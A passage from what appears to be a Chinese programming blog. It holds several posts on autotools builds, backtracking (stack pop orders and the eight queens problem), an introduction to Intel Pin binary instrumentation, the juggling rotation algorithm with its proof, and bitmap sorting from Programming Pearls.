     std::cout<<PACKAGE_STRING; /* use the preprocessor definitions
     from config.h */
     first_word.print();
     second_word.print();
     return 0;
 }

 //hello.hxx

 #include <iostream>
 #ifndef HELLO_HXX
 #define HELLO_HXX
 class hello{
 public:
 void print();
 };
 #endif

 //hello.cxx

 #include "hello.hxx"
 void hello::print()
 {
 std::cout<<" Hello ";
 }

world的内容跟hello一样，将hello.hxx和hello.cxx中的“hello”换成“world”即可。

执行autoscan生成一个configure.scan，这是一个模板，我们将其名字改为configure.ac。修改成一下内容：

 #                                               -*- Autoconf -*-
 # Process this file with autoconf to produce a configure script.
	
 AC_PREREQ([2.68])
 AC_INIT(helloworld, 0.01, [email protected])
 AM_INIT_AUTOMAKE
 AC_CONFIG_SRCDIR([include/hello.hxx])
 AC_CONFIG_HEADERS([config.h])
	
 # Checks for programs.
 AC_PROG_CXX
 AC_PROG_RANLIB
 # Checks for libraries.
	
 # Checks for header files.
	
 # Checks for typedefs, structures, and compiler characteristics.
	
 # Checks for library functions.
	
 AC_CONFIG_FILES([Makefile
                  lib/Makefile
                  src/Makefile])
 AC_OUTPUT

填写各个目录的Makefile.am：

 helloworld/Makefile.am：
	
 SUBDIRS=lib src

 helloworld/lib/Makefile.am：

 noinst_LIBRARIES=libhw.a ## static library which is not to be installed
 libhw_a_SOURCES=hello.cxx hello.hxx world.cxx world.hxx
 libhw_a_CXXFLAGS=-I../include ## add path to headerfiles


 helloworld/src/Makefile.am：

 bin_PROGRAMS=helloworld
 helloworld_SOURCES=main.cxx
 helloworld_CXXFLAGS= -I../include ## add path to headerfiles
 helloworld_LDADD=../lib/libhw.a ## link with static library

接下来执行aclocal autoconf autoheader 命令，然后执行 automake -a 。至此所有该有的文件都有了。
执行./configure可以看到检测条件过程，执行make编程程序，sudo make install 安装。

回溯算法及其例子

2014-01-12T00:00:00+00:00

源起
回溯简介
所有可能出栈顺序
八皇后问题

源起

最近在看《算法》,其中有一个题是很老的问题，0~9入栈顺序一定，问哪些出栈顺序是不可能的。如0,1,2,…,7,8,9肯定是可以的，9,8,7,…3,2,1也可以，8,2,3，…就不可以。这个问题本身是比较简单的，这个问题引出的问题就是求出所有可能的出栈顺序，主要是借此机会复习一下回溯法。

先来就题论题。解题的关键还是模拟出入栈，比如要判断的例子是4,3,2,1,0,9,8,7,6,5。我们先看到第一个出的是4，必然0,1,2,3已经依次压栈了。

我们首先建立一个空栈s,，还有一个输入序列的index，这表示出栈的值，以及即将入栈的元素in，index和in的初始值显然是0,input表示输入的序列；
当in不等于input[index]时，我们将in入栈，in再加1，直到其等于input[index]；
in++，index++；这表示4已经顺利出栈；
然后比较s.peek()跟input[index]的值，如果不同，继续循环入栈，相同则出栈；

对照例子我们人肉走一遍程序：

in=0，input[0]=4，将0,1,2,3入栈s；
in=4时，in=input[0],接着in=5,index=1;
栈顶3与序列中input[index]相等，index=2；一直到0都相等；此时，index=5,in=5，栈s为空；
5小于9，将5,6,7,8入栈；

剩下的跟1~3步类似了。

代码如下：

public class StackSeq
{
	public static boolean isOk(int[] input,int n)
	{
		int index = 0;
		int in = 0;
		Stack<Integer> s = new Stack<Integer>();

		while(true)
		{
			if(index >= n - 1)
				return true;
			if(in >= n)
				return false;

			if(in != input[index])
			{
				s.push(in);
				++in;
				continue;
			}

			++in;
			++index;
			while(!s.isEmpty() && s.peek() == input[index])
			{
				++index;
				s.pop();
			}

		}
	}

	public static void main(String[] args)
	{
		StdOut.println("input the number of arrays:");
		int n = StdIn.readInt();
		int[] input = new int[n];
		
		while(true)
		{
			for (int i = 0 ; i < n ; ++i) 
			{
				input[i] = StdIn.readInt();
			}
			boolean ret = isOk(input,n);
			if(ret == true)
			{
				StdOut.println("the sequeue is ok!");
			}
			else
				StdOut.println("the sequeue is not ok!");
		}
		
	}
}

原谅我那蹩脚的java。

回溯简介

知道了如何判断一个序列是否是正确的出栈序列，我们自然会想到求出所有的正确出栈序列。这也是本文的主题，回溯算法。回溯算法的思想还是比较简单，我在百度百科摘了一段如下：

从一条路往前走，能进则进，不能进则退回来，换一条路再试。八皇后问题就是回溯算法的典型，第一步按照顺序放一个皇后，然后第二步符合要求放第2个皇后，如果没有符合条件的位置符合要求，那么就要改变第一个皇后的位置，重新放第2个皇后的位置，直到找到符合条件的位置就可以了。回溯在迷宫搜索中使用很常见，就是这条路走不通，然后返回前一个路口，继续下一条路。回溯算法说白了就是穷举法。不过回溯算法使用剪枝函数，剪去一些不可能到达最终状态（即答案状态）的节点，从而减少状态空间树节点的生成。回溯法是一个既带有系统性又带有跳跃性的的搜索算法。它在包含问题的所有解的解空间树中，按照深度优先的策略，从根结点出发搜索解空间树。算法搜索至解空间树的任一结点时，总是先判断该结点是否肯定不包含问题的解。如果肯定不包含，则跳过对以该结点为根的子树的系统搜索，逐层向其祖先结点回溯。否则，进入该子树，继续按深度优先的策略进行搜索。回溯法在用来求问题的所有解时，要回溯到根，且根结点的所有子树都已被搜索遍才结束。而回溯法在用来求问题的任一解时，只要搜索到问题的一个解就可以结束。这种以深度优先的方式系统地搜索问题的解的算法称为回溯法，它适用于解一些组合数较大的问题。

我在网上找到了这里有一个比较好的说明。这里我们用求1,2,3…n数里面r个数的排列来简要介绍一下回溯算法。在上面的链接中偷了一张图

也就是第一步的时候我们选择1——n中一个数，比如选了1，然后再在剩下的n-1个数中求出其排列，完了，我们再回溯到第一步，选择2，之后的依此类推。为了不产生重复的数字，我们在进行下一步的前进之前进行了判断。代码如下：

#include <iostream>
using namespace std;

int count = 0;
void print(int* a,int m)
{
	for (int k = 0; k < m; ++k)
	{
		cout << a[k] << " ";
	}
	cout << endl;
}

void tuple(int* a,int i,int m,int n)
{
	
	if(i == m)
	{
		print(a,m);
		count++;
		return;
	}
	for (int k = 1; k <= n; ++k)
	{
		for (int h = 0; h < i; ++h)
		{
			if(a[h] == k)
			{
				goto LOOP;
			}
		}
		
		a[i] = k;
		tuple(a,i+1,m,n);
		LOOP:
		continue;
	}
}


int main()
{
	int a[1000];
	int n,m;
	cout << "input C(n,m) :\n";
	cin >> n >> m;
	cout << "("<< n <<","<< m << ")排列数" << endl;
	tuple(a,0,m,n);
}

根据这段代码求组合数跟全排列也很简单了。总结一下使用递归解回溯，递归函数第一部分判断递归终止条件，然后是递归进入下一个维度，之后回溯。

所有可能出栈顺序

我们来看看这个问题如何使用回溯法。

关键的点就在，“一个元素i入栈之后，我们面临两种选择，i出栈，或者i+1入栈”，这就有了回溯的基础。而问题的终点就是有了N个元素之后。递归函数就应该这样设计

public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)

n是元素个数，解的维度，cur表示当前的维度，tmp表示2中选择中的进栈，out存放的出栈的元素。终止条件显然是out的元素个数是n。得源码如下：

public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
	{
		if(n == out.size())
		{
			for(int i : out)
			{
				StdOut.print(i + " ");
			}
			StdOut.println("");
			count++;
			return;
		}

		if(cur != n)//入栈
		{
			tmp.push(cur);
			printiter(n,cur + 1,tmp,out);
			tmp.pop();
		}

		if(!tmp.isEmpty())
		{
			int x = tmp.pop();
			out.add(x);
			
			printiter(n,cur,tmp,out);
			out.remove(out.size() - 1);
			tmp.push(x);
		}
	}

八皇后问题

借这个机会再来说说八皇后这个老问题。8*8的棋盘上放8只皇后，使得每一只都不相互攻击对方。我们一步一步用上面的思路来解决这个问题。容易想到使用

bool solution[7][7]

来表示每个位置的是否放皇后，如果为false则不妨，true就放皇后。我们首先可以得出如下的结构，能够将所有的可能计算出来。

#include <iostream>
using namespace std;

#define N 8

bool solution[N][N] = {false};
void print_solution()
{
	for (int i = 0; i < N; ++i)
	{
		for (int j = 0; j < N; ++j)
		{
			cout << solution[i][j] <<" ";
		}
		cout << endl;
	}
	cout << "\n\n\n";
}


void QueenIter(int x,int y)
{
	if(y == N)
	{
		x++;
		y = 0;
	}

	if(x == N)
	{
		print_solution();
		return;
	}

	solution[x][y] = true;
	QueenIter(x,y+1);

	solution[x][y] = false;
	QueenIter(x,y+1);
}

int main()
{
	QueenIter(0,0);
}

看出结构也是首先判断是否终止，然后遍历该维度能取得所有值，进入下一个维度。（该例输出太大，若要跑程序，建议将N改成4）

下面的步骤是排除所有不可能的解，很明显只有当要放皇后的时候才需要判断。

我们建立4个bool数组，数组中的每个元素记录这个位置还能否放皇后。为了使得皇后的个数为8，我们还需要增加一个参数c，只有c等于8时，我们才输出方案。

void QueenIter(int x,int y,int c)
{
	if(y == N)
	{
		x++;
		y = 0;
	}

	if(x == N)
	{
		if(c==N)
		{
			print_solution();
		}	
		return;
	}

	int d1 = (x+y) % 15;
	int d2 = (x-y + 15) % 15;
	if(!mx[x] && !my[y] && !md1[d1] && !md2[d2])
	{
		mx[x] = my[y] = md1[d1] = md2[d2] = true;
		solution[x][y] = true;
		QueenIter(x,y+1,c+1);
		mx[x] = my[y] = md1[d1] = md2[d2] = false;
	}
	

	solution[x][y] = false;
	QueenIter(x,y+1,c);
}

由于一行只能放置1个皇后，可以改进一下，改进后如下：

#include <iostream>
using namespace std;

#define N 8
int solution[N] = {0};
bool my[8],md1[15],md2[15];
int count = 0;
void print_solution()
{
	for (int i = 0; i < N; ++i)
	{
		for (int j = 0; j < solution[i]; ++j)
		{
			cout << 0 << " ";
		}
		cout << 1 << " ";
		for (int j = solution[i] + 1; j < N; ++j)
		{
			cout << 0 << " ";
		}
		cout << endl;
	}

	cout << "\n\n\n";
}


void Queen(int x)
{
	if(x == 8)
	{
		print_solution();
		count++;
		return;
	}

	for (int i = 0; i < N; ++i)
	{
		int d1 = (x+i) % 15;
		int d2 = (x-i+15) % 15;
		if (!my[i] && !md1[d1] && !md2[d2])
		{
			my[i] = md1[d1] = md2[d2] = true;
			solution[x] = i;
			Queen(x+1);
			my[i] = md1[d1] = md2[d2] = false;
		}
		
	}
}

int main()
{
	Queen(0);
	cout << count << endl;
}

Intel Pin简介

2014-01-02T00:00:00+00:00

1. Intel Pin简介

Pin是Intel公司开发的动态二进制插桩框架，可以用于创建基于动态程序分析工具，支持IA-32和x86-64指令集架构，支持windows和linux。

简单说就是Pin可以监控程序的每一步执行，提供了丰富的API，可以在二进制程序程序运行过程中插入各种函数，比如说我们要统计一个程序执行了多少条指令，每条指令的地址等信息。显然，这样我们对程序完全掌握了以后是可以做很多事的。比如对程序的内存使用检测，对程序的性能评估，实际上我是在很多介绍Taint分析的文章中知道Pin，我也准备对Pin写一个系列的文章。

2. PinTools的编译

本节简单叙述一下PinTools在windows下的编译

1.Pin官网按照VS的版本选择对应的Pin版本

2.安装Cygwin，记得选择安装make工具

3.安装好Cygwin之后，将Cygwin目录下面的bin目录添加到环境变量Path中

4.通过VS的命令行进入pin/source/tools/ManualExamples目录下，使用make命令即可编译ManualExamples下的例子，也可以在tools目录下编译所有PinTools，windows下生成的文件一般都是dll。

3. 使用示例

在cmd下运行命令（test.exe自己随便写的helloword，itrace.dll就是2中编译出来的manualExamples/obj-ia32下面的dll）

pin -t itrace.dll -- test.exe

结果会在文件夹下面生成一个itrace.out文件，里面记录的就是各个指令的地址，通过与OD里面的反汇编的结果我们可以看到，pin并不是从二进制映像文件的第一条指令记录，而是从进程的指令记录（似乎也不是第一条），也就是ntdll里面线程执行函数开始的。

4. Pin深入

本部分翻译自Pin文档，肯定有不少问题，欢迎指正。

认识Pin的最好方法是认为它是一个JIT编译器。这个编译器的输入不是字节码而是普通的可执行文件。Pin截获这个可执行文件的第一条指令，产生新的代码序列。接着将控制流程转移到这个产生的序列。产生的序列基本上跟原来的序列是一样的，但是Pin保证在一个分支结束后重新获得控制权。重新获得控制权之后，Pin为分支的目标产生代码并且执行。Pin通过将所有产生的代码放在内存中，以便于重新使用这些代码并且可以直接从一个分支跳到另一个分支，这提高了效率。

在JIT模式，执行的代码都是Pin生成的代码。原始代码仅仅是用来参考。当生成代码时，Pin给用户提供了插入自己代码的机会（插桩）。

Pin的桩代码都会被实际执行的，不论他们位于哪里。大体上，对于条件分支存在一些异常，比如，如果一个指令从不执行，它将不会被插入桩函数。

Pintools

概念上说，插桩包括两个组件：

决定在哪里插入什么代码的机制
插入点执行的代码

这两个组件就是桩和分析代码。两个组件都在一个单独的可执行体重，即Pintool。Pintools可以认为是在Pin中的的插件，它能够修改生成代码的流程。

Pintool注册一些桩回调函数在Pin中，每当Pin生成新的代码时就调用回调函数。这些回调函数代表了桩组件。它可以检查将要生成的代码，得到它的静态属性，并且决定是否需要以及在哪里插入调用来分析函数。

分析函数收集关于程序的数据。Pin保证整数和浮点指针寄存器的状态在必要时会被保存和回复，允许传递参数给（分析）函数。

Pintool也可以注册一些事件通知回调，比如线程创建和fork，这些回调大体上用于数据收集或者初始化与清理。

Observations

由于Pintool类似插件一样工作，所以它必须处于Pin与被插桩的可执行文件的地址空间。这样，Pintool就能够访问可执行文件的所有数据。它也跟可执行文件共享文件描述符与进程其他信息。

Pin和Pintool从第一条指令控制程序。对于与共享库一起编译的可执行文件，这意味着动态加载器和共享库将会对Pintool可见。

当编写tools时，最重要的是调整分析代码而不是桩代码。因为桩代码执行一次，而分析代码执行许多次。

Instrumentation Granularity

如上所述，Pin的插桩是实时的。插桩发生在一段代码序列执行之前。我们把这种模式叫做踪迹插桩（trace instrumentation）。

踪迹插桩让Pintool在可执行代码每一次执行时都能进行监视和插装。trace通常开始于选中的分支目标并结束于一个条件分支，包括调用(call)和返回(return)。Pin能够保证trace只在最上层有一个入口，但是可以有很多出口。如果在一个trace中发生分支，Pin从分支目标开始构造一个新的trace。Pin根据基本块(BBL)分割trace。一个基本块是一个有唯一入口和出口的指令序列。基本块中的分支会开始一个新的trace也即一个新的基本块。通常为每个基本块而不是每条指令插入一个分析调用。减少分析调用的次数可以提高插装的效率。trace插装利用了TRACE_AddInstrumentFunction API call。

注意，虽然Pin从程序执行中动态发现执行流，Pin的BBL与编译原理中的BBL定义不同。如，考虑生成下面的switch statement：

switch(i)
{
    case 4: total++;
    case 3: total++;
    case 2: total++;
    case 1: total++;
    case 0:
    default: break;
}

它将会产生如下的指令（在IA-32架构上）

.L7:
    addl    $1, -4(%ebp)
.L6:
    addl    $1, -4(%ebp)
.L5:
    addl    $1, -4(%ebp)
.L4:
    addl    $1, -4(%ebp)

在经典的基本块中，每一个addl指令会成为一个单指令基本块。但是Pin会对不同的这几种不同的switch cases产生包含4条指令的BBL(当遇到.L7 case），3个基本块（当遇到.L6 case），如此类推。这就是说Pin的BBL个数会跟用书上的定义的BBL不一样。例如，这里当代码分支到.L7时，有1个BBL，但是有四个经典的基本块被执行。

Pin也会拆散其他指令为BBL，比如cpuid,popf,和rep前缀的指令。因为rep前缀治理那个被当做隐式的循环，如果一个rep前缀指令不止循环一次，在第一次之后将会产生一个单指令的BBL，所以这种情形会产生比你预期多的基本块。

为了方便编写Pintool，Pin还提供乐指令插桩模式（instruction instrumentation），让工具可以监视和插装每一条指令。本质上来说这两种模式是一样的，编写Pintool时不需要在为trace的每条指令反复处理。就像在trace插桩模式下一样，特定的基本块和指令可能会被生成很多次。指令插装用到了 INS_AddInstrumentFunction API call。

有时，进行不同粒度的插桩比trace更有用。Pin对这种模式提供了两种模式：镜像和函数插桩。这些模式是通过缓存插桩要求，因此需要额外的空间，这些模式也称作提前插桩。

镜像插装让Pintool在IMG第一次导入的时候对整个image进行监视和插装。Pintool的处理范围可以是镜像中的每个块(section，SEC)，块中的每个函数(routine, RTN)，函数中的每个指令（instruction, INS）。插装可以在一个函数或者一条指令开始执行之前或者结束执行之后执行。镜像插装用到了 IMG_AddInstrumentFunction API call。镜像插装依靠符号信息判断函数的边界，因此需要在PIN_Init之前调用PIN_InitSymbols。

函数插装让Pintool在线程第一次调用之前监视和插装整个函数。Pintool的处理范围可以是函数里的每条指令。这里没有足够的信息把指令归并成基本块。插装可以在一个函数或者一条指令开始执行之前或者结束执行之后执行。函数插桩时Pintool的作者能够更方便的在镜像插桩过程中便利各个sections。

函数插装用到了RTN_AddInstrumentFunction API call。插装在函数结束后不一定能可靠地工作，因为当最后出现调用时无法判断何时返回。

注意在镜像插桩和函数插桩中，不可能知道一个(分析）函数会被执行（因为这些插桩实发生在镜像被载入时）。在Trace和Instruction中只有被执行的代码才会被遍历。

Managed platforms support

Pin支持所有可执行文件包括托管的二进制文件。从Pin的角度来看，托管文件是一种自修改程序。有一种方法可以使Pin区分即时编译的代码(Jitted代码)和所有其他动态生成的代码,并且将Jitted代码与合适的管理函数联系在一起。为了支持这个功能，运行管理托管平台的JIT compiler必须支持Jit Profiling API。

必须支持下面的功能：

RTN_IsDynamic() API用来识别动态生成的代码。一个函数必须被Jit Profiling API标记为动态生成的。
一个Pin tool可以使用RTN_AddInstrumentFunction API加入Jitted函数

为了支持托管平台，以下条件必须满足：

设置INTEL_JIT_PROFILER32和INTEL_JIT_PROFILER64环境变量，以便占用pinjitprofiling dynamic library

For Windows

 set INTEL_JIT_PROFILER32=<The Pin kit full path>\ia32\bin\pinjitprofiling.dll
 set INTEL_JIT_PROFILER64=<The Pin kit full path>\intel64\bin\pinjitprofiling.dll

For Linux

 setenv INTEL_JIT_PROFILER32 <The Pin kit full path>/ia32/bin/libpinjitprofiling.so
 setenv INTEL_JIT_PROFILER64 <The Pin kit full path>/intel64/bin/libpinjitprofiling.so

在Pin命令行为Pin tool加入knob support_jit_api选项

Symbols

Pin利用符号对象（SYM）提供了对函数名字的访问。符号对象仅仅提供了在程序中的关于函数的符号。其他类型的符号（如数据符号）需要通过tool独立获取。

在Windows上，可以通过dbghelp.dll实现这个功能。注意在桩函数中使用dbghelp.dll并不安全，可能会导致死锁。一个可能的解决方案是通过一个不同的未被插桩的进程得到符号。

在Linux上，libefl.so或者libdwarf.so可以用来获取符号信息。

为了通过名字访问函数必须先调用PIN_InitSymbols。

Floating Point Support in Analysis Routines

Pin在执行各种分析函数时保持者程序的浮点指针状态。

IARG_REG_VALUE不能作为浮点指针寄存器参数传给分析函数。

Instrumenting Multi-threaded Applications

给多线程程序插桩时，多个合作线程访问全局数据时必须保证tool是线程安全的。Pin试图为tool提供传统C++程序的环境，但是在一个Pintool是不可以使用标准库的。比如，Linux tool不能使用pthread，Windows不能使用Win32API管理线程。作为替代，应该使用Pin提供的锁和线程管理API。

Pintools在插入桩函数时，不需要添加显示的锁，因为Pin是在得到VM lock内部锁之后执行这些函数的。然而，Pin并行执行分析代码和替代函数，所以Pintools如果访问这些函数，可能需要为全局数据加锁。

Linux上的Pintools需要注意在分析函数或替代函数中使用C/C++标准库函数，因为链接到Pintools的C/C++标准函数不是线程安全的。一些简单C/C++函数本身是线程安全的，在调用时不需要加锁。但是，Pin没有提供一个线程安全函数的列表。如果有怀疑，需要在调用库函数的时候加锁。特别的，errno变量不是多线程安全的，使用这个变量的tool需要提供自己的锁。注意这些限制仅存在Unix平台，这些库函数在Windows上是线程安全的。

Pin可以在线程开始和结束的时候插入回调函数。这为Pintool提供了一个比较方便的地方分配和操作线程局部数据。

Pin也提供了一个分析函数的参数（ARG_THREAD_ID），用于传递Pin指定的线程ID给调用的线程。这个ID跟操作系统的线程ID不同，它是一个从0开始的小整数。可以作为线程数据或是用户锁的索引。

除了Pin线程ID，Pin API提供了有效的线程局部存储(TLS），提供了分配新的TLS key并将它关联到指定数据的清理函数的选项。进程中的每个线程都能够在自己的槽中存储和取得对应key的数据。所有线程中key对应的value都是NULL。

False共享发生在多个线程访问相同的缓cache line的不同部分,至少其中之一是写。为了保持内存一致性，计算机必须将一个CPU的缓存拷贝到另一个，即使其他数据没有共享。可以通过将关键数据对其到cache line上或者重新排列数据结构避免False共享。

Avoiding Deadlocks in Multi-threaded Applications

因为Pin,the tool和程序可能都会要求或释放锁，Pin tool的开发者必须小心避免死锁。死锁经常发生在两个线程以不同的顺序要求同样的锁。例如，线程A要求lock L1，接着要求L2,线程B要求lock L2，接着要求L1。如果线程A得到了L1，等待L2，同时线程B得到了L2，等待L1，这就导致了死锁。为了避免死锁,Pin为必须获得的锁强加了一个层次结构。Pin在要求任何锁时会要求自己的内部锁。我们假设应用将会在这个层次结构的顶端获得锁。下面的图展示了这种结构：

Application locks -> Pin internal locks -> Tool locks

Pin tool开发者在设计他们自己的锁时不应该破坏这个锁层次结构。下面是基本的指导原则：

如果tool在一个Pin回调中要求任何锁，它在从这个回调中返回时必须释放这些锁。从Pin内部锁看来，在Pin回调中占有一个锁违背了这个层次结构。
如果tool在一个分析函数中请求任何锁，它从这个分析函数中返回时必须释放这些锁。从Pin内部锁和程序自身看来，在分析函数中占有一个锁违背了这个层次结构。
如果tool在一个Pin回调或者分析函数中调用Pin API，它不应该在调用API的时候占有任何锁。一些Pin API使用了内部Pin锁，所以在调用这些API时占有一个tool锁违背了这个层次结构。
如果tool在分析函数里面调用了Pin API，它可能需要在要求Pin客户锁时调用PIN_LockClient()。这取决于API，需要查看特定API的更多信息。注意tool在调用PIN_Lockclient（）时，不能占有任何上述所述其他锁。

虽然上述的指导在大多数情况下已经足够，但是它们活血在某些特定的情形下显得比较严格。下面的指导解释了上述基本指导的放松情形：

在JIT模式下，tool可能在分析函数中要求锁而不释放它们，直到将要离开包含这个分析函数的trace。tool必须期望trace在程序还没有抛出异常的时尽早退出。任何被tool占有的锁L在程序抛出异常时，必须遵守以下规则：
- tool必须建立一个当程序抛出异常时的处理回调，这个回调会释放之前得到的锁L。可以使用PIN_AddContextChangeFunction()建立这个回调。
- 为了避免破坏这个层次结构，tool禁止在Pin回调中要求锁。
如果tool从一个分析函数中调用Pin API，如果在调用API时繁盛了下面情况，它可能会要求并占有一个锁L：
- 锁L不是从任何Pin回调中请求的。这避免了违背这个层次结构。
- 被调用的Pin API不会导致程序代码被执行。这避免了违背这个层次结构。

杂耍算法及其证明

2013-12-22T00:00:00+00:00

这是编程珠玑上面的一个题，也是笔试中出烂了的题目。题目非常简单，描述如下：将一个n元一维向量向左旋转i个位置，例如当n=8，i=3时，向量abcdefgh旋转为defghabc。简单的代码使用一个n元的中间向量在n步内完成该工作。你能否仅使用额外字节的存储空间，在正比于n的时间内完成向量的旋转？

下面是最简单的一种解法。

	#include <iostream>

	using namespace std;
	
	void reverse(char *a,int beg, int end)
	{
		char tmp;
		for (; beg < end; beg++, end-- )
		{
			tmp = a[beg];
			a[beg] = a[end];
			a[end] = tmp;
	    }
	}
	
	void LeftReverse(char *a,int n, int k)
	{
	     reverse(a,0,k - 1);
	     reverse(a,k,n - 1 );
	     reverse(a,0,n - 1);
	}
	
	int main()
	{
	     char test[] = "123abcdefg" ;
	     LeftReverse(test,strlen(test),3);
	     printf( "reversed:%s",test);
	     return 0;
	}

当然，今天的主题不是这个，而是书中提到的另一种解法：英文是啥给忘了，翻译成“杂耍算法”。这个算法的步骤是这样的：move x[0] to the temporary t, then move x[i] to x[0], x[2i] to x[i], and so on, until we come back to taking an element from x[0], at which point we instead take the element from t and stop the process. If that process didn’t move all the elements , then we start over at x[1], and continue until we move all the elements.具体代码如下：

	#include <iostream>
	
	using namespace std;
	
	int gcd(int a,int b)
	{
	    int c;
	    if (a < b)
	    {
	        c = a;
	        a = b;
	        b = c;
	    }
	    while(b)
	    {
	        if(a % b == 0)
	            return b;
	        else
	        {
	            c = a % b;
	            a = b;
	            b = c;
	        }
	    }
	}
	
	void rotate(char * a,int n, int k)
	{
	    char tmp;
	    int j;
	    for (int i = 0; i < gcd(n,k); ++i)
	    {
	        tmp = a[i];
	        for (j = i + k; j!= i; j = (j + k) % n)
	        {
	            a[(j-k+n) % n] = a[j];
	        }
	        j = (j - k + n ) % n;
	        a[j] = tmp;
	    }
	}
	int main()
	{
	    char a[] = "abc12345678" ;
	    cout << "gcd(11,3):" << gcd(11,3) << endl;
	    rotate(a,11,3);
	    printf ( "after rotate:%s\n",a);
	    return 0;
	}

经过如下图所示的步骤之后，就完成了移位，此例中i=3,n=11。

这个算法会在执行$gcd（i,n）$次后就停止了，为什么？这就涉及到数论知识了，也就是今天的主题。

数论中有这样一个结论：$n$个数

\[0\,mod\,n,\quad i\,mod\,n,\quad 2i\,mod\,n,\quad \cdots,\quad (n-1)i\,mod\,n\quad (1)\]

按照某种次序恰好组成$\frac{n}{d}$个数

\[0,\quad d,\quad 2d,\quad \cdots,\quad n-d\quad \quad (1)\]

的$d$份复制，其中$d=gcd(i,n)$.例如，当$n=12$且$i= 8$时，有$d=4$，这些数就是$0,8,4,0,8,4,0,8,4,0,8,4$.

证明（指出我们得到前面$\frac{n}{d}$个值的$d$份复制）的第一部分是显然的，根据同余式的基本理论，我们有

\[ji\equiv ki(mod\,n)\Leftrightarrow j\frac{i}{d}\equiv k\frac{i}{d}(mod\,\frac{n}{d})\]

可以看到当$0\leqslant k< \frac{n}{d}$时，我们得到了就是这$\frac{n}{d}$个数的$d$份复制，$k$的取值就是模数为$\frac{n}{d}$的最小完全非负剩余系中的数。

现在证明这$\frac{n}{d}$个数就是${0,d,2d,\cdots,n-d}$（按照某种次序排列）。记$i={i}'d,n={n}'d$.根据mod的分配率$c(x\,mod\,y)=(cx)\,mod\,(cy)$,就有

\[ki\,mod\,n=d(k{i}'\,mod\,{n}')\]

所以当$0\leqslant k< {n}'$时出现的那些值就是$d$乘以以下诸数

\[0\,mod\,{n}',\quad {i}'\,mod\,{n}',\quad {2{i}'}\,mod\,{n}',({n}'-1){i}'\,mod\,{n}'\]

我们知道$({i}',{n}')=1$，所以我们只需要证明$d=1$的情况，也就是$i$与$n$互素的情况。

现在我们假设$(i,n)=1$，(1)式中的数是各不相同的，如若不然，取$k,j\in [0,n-1],k\neq j$，假设$ki=ji$，则有$ki\equiv ji(mod\,n)$。由于$(i,n)=1$，则$k\equiv j(mod\,n)$，所以$k=j$，显然矛盾。所以(1)中的数恰好就是$0,1,2,\cdots,n-1$

结论证完，下面回到例子简要分析，在本例中$n=11,i=3,gcd(11,3)=1$，于是

\[0,3\,mod\,11,6\,mod\,11,\cdots,10*3\,mod\,11\]

的值恰好就是$11$的最小非负完全剩余系按一定顺序排列的结果。所以经过如下的步骤

t = x[0]
x[0] = x[i mod n]
x[i mod n] = x[2i mod n]
……
x[(n-2)*i mod n] = x[(n-1)*i mod n]
x[(n-1)*i mod n] = t

之后，所有的元素都到了该去的地方，

当$(n,i)=d(d\neq 1)$怎么办呢。从上面的结论我们可以知道每隔${n}'=\frac{n}{d}$之后，序列会从$0,d,2d,\cdots,{n}'-d$的某个序列重新开始，这样我们就又遇到$x[0]$了。这个时候我们需要将$x[1]$移到$t$，重复上述步骤，我们简要看看图示。

看看图示就明了了。

这是复习数论的时候遇到的一个结论，然后想起曾经的一个题。现在确实是完全清晰了。人说，数学是科学的女皇，数论是数学的女皇，数论里面充满着迷人的结论。这世间充满了美妙，我希望能够与诸君分享。

【编程珠玑】第一章

2013-12-04T00:00:00+00:00

问题：一个文件最多有n(n=1000w)个正整数，每一个正整数都<n，并且它们是不重复的，如何使用一种快速的方法给这些正整数排序。要求内存最多是1M。

方法一：使用归并排序，归并排序的时间复杂度是nlgn。但是归并排序需要将数据一次全部读入内存，但是很明显需要的内存空间是1000w4/(10241024)，大约是40M，占用空间太大。

方法二：可以将这些正整数分成40组，分别是[0–249999]、[250000–499999]….[9750000–9999999]，然后遍历40次这些整数，第一次找出[0–249999]里面的，第二次找出[250000–4999999]里面的。这样每次处理的是250000个数，内存上符合要求，但是时间太多，更何况I/O操作相当费时。

方法三：就是这一章的主题了，位图排序。其基本思想是用1个bit来表示[0–n]中数是否存在，如果存在这个bit置为1，否则置0。这样之后，再遍历一下，就排好序了，这样的使用的空间大致是n/(8*1024*1024)M，1000w大致就是1.25M。例如对于集合{1,2,3,5,8,13}，都小于20，假设我们有20个bit，则它的位图表示就是01110100100001000000，再一遍历，就排好了。这种方法的伪代码表示如下:

for i = [0,n)
    bit[i] = 0

for each i in the input file
    bit[i] = 1

for i = [0,n)
    if  bit[i] == 1
        write i on the output file

实际的代码如下：

/* Copyright (C) 1999 Lucent Technologies */

/* From 'Programming Pearls' by Jon Bentley */



/* bitsort.c -- bitmap sort from Column 1

*   Sort distinct integers in the range [0..N-1]

*/


#include <stdio.h>
#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000

int a[1 + N/BITSPERWORD];

void set(int i) {        a[i>>SHIFT] |=  (1<<(i & MASK)); }
void clr(int i) {        a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int  test(int i){ return a[i>>SHIFT] &   (1<<(i & MASK)); }

int main()
{   
    int i;
    for (i = 0; i < N; i++)
      clr(i);
/*  Replace above 2 lines with below 3 for word-parallel init

    int top = 1 + N/BITSPERWORD;
    for (i = 0; i < top; i++)
      a[i] = 0;
*/
    while (scanf("%d", &i) != EOF)
        set(i);
    for (i = 0; i < N; i++)
        if (test(i))
           printf("%d\n", i);

    return 0;
}

代码没有什么说的，就是需要注意下别人对位图的操作时比较巧妙的。很明显，位图法的使用时有一些场景的：

1.输入的数需要有一个范围

2.输入的数应该是没有重复，如果重复次数不超过m次，那么lgm个bit来表示1个数

课后问题：

1. 使用库函数排序

C语言

/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */

/* qsortints.c -- Sort input set of integers using qsort */

#include <stdio.h>
#include <stdlib.h>

int intcomp(int *x, int *y)
{       
    return *x - *y;
}

int a[1000000];

int main()
{   
    int i, n=0;
    while (scanf("%d", &a[n]) != EOF)
        n++;
    qsort(a, n, sizeof(int), intcomp);
    for (i = 0; i < n; i++)
        printf("%d\n", a[i]);
    return 0;
}
C++语言

/* Copyright (C) 1999 Lucent Technologies *//* From 'Programming Pearls' by Jon Bentley */

/* sortints.cpp -- Sort input set of integers using STL set */

#include <iostream>
#include <set>
using namespace std;

int main()
{       
    set<int> S;
    int i;
    set<int>::iterator j;
    while (cin >> i)
        S.insert(i);
